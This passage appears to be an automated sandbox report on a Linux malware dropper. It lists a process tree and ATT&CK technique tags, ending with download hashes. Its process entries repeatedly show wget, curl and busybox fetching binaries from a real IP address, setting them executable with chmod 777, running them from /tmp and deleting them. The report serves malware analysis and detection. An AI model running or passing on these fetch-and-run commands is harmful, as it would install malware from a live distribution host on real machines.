  - /bin/chmod | chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 875
    - File and Directory Permissions Modification
  - /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | ./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 876
    - Executes dropped EXE
  - /bin/rm | rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P | PID 877
  - /usr/bin/wget | wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 878
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 879
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 880
  - /bin/chmod | chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 881
    - File and Directory Permissions Modification
  - /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | ./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 882
    - Executes dropped EXE
  - /bin/rm | rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT | PID 883
  - /usr/bin/wget | wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 884
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 885
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 886
  - /bin/chmod | chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 887
    - File and Directory Permissions Modification
  - /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | ./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 888
    - Executes dropped EXE
  - /bin/rm | rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR | PID 889
  - /usr/bin/wget | wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 890
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 891
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 892
  - /bin/chmod | chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 893
    - File and Directory Permissions Modification
  - /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | ./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 894
    - Executes dropped EXE
  - /bin/rm | rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t | PID 895
  - /usr/bin/wget | wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 896
    - System Network Configuration Discovery
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 897
    - Checks CPU configuration
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 898
    - System Network Configuration Discovery
  - /bin/chmod | chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 899
    - File and Directory Permissions Modification
  - /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | ./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 900
    - Executes dropped EXE
    - System Network Configuration Discovery
  - /bin/rm | rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG | PID 901
    - System Network Configuration Discovery
  - /usr/bin/wget | wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 902
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 903
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 904
  - /bin/chmod | chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 905
    - File and Directory Permissions Modification
  - /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | ./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 906
    - Executes dropped EXE
  - /bin/rm | rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK | PID 907
  - /usr/bin/wget | wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 908
  - /usr/bin/curl | curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 909
    - Checks CPU configuration
    - Reads runtime system information
    - Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 910
  - /bin/chmod | chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 913
    - File and Directory Permissions Modification
  - /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | ./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 914
    - Executes dropped EXE
  - /bin/rm | rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt | PID 915
  - /usr/bin/wget | wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw | PID 916

Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification: 1
  - Linux and Mac File and Directory Permissions Modification: 1
- Virtualization/Sandbox Evasion: 1
  - System Checks: 1
Downloads
- Filesize: 153B
  - MD5: 998368d7c95ea4293237f2320546e440
  - SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  - SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  - SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97